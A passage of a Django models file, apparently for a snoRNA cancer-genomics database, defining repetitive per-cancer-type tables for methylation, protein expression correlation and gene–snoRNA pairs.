start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_CHOL(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_COAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_DLBC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_ESCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_HNSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_KICH(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_KIRC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_KIRP(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_LGG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_LIHC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_LUAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_LUSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_MESO(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_OV(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_PAAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_PCPG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_PRAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_READ(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_SARC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_SKCM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_STAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_TGCT(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_THCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_THYM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_UCEC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_UCS(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_UVM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
# protein expression
class protein_expression_ACC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_BLCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_BRCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_CESC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_CHOL(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_COAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_DLBC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_ESCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_HNSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_KICH(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_KIRC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_KIRP(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_LGG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_LIHC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_LUAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_LUSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_MESO(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_OV(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_PAAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_PCPG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_PRAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_READ(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_SARC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_SKCM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_STAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_TGCT(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_THCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_THYM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_UCEC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_UCS(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_UVM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
# for gene snorna pair
class gene_snorna_pair_ACC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_BLCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_BRCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_CESC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_CHOL(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_COAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_DLBC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_ESCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_HNSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_KICH(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_KIRC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_KIRP(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_LGG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_LIHC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_LUAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_LUSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_MESO(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_OV(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_PAAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_PCPG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_PRAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_READ(models.Model):
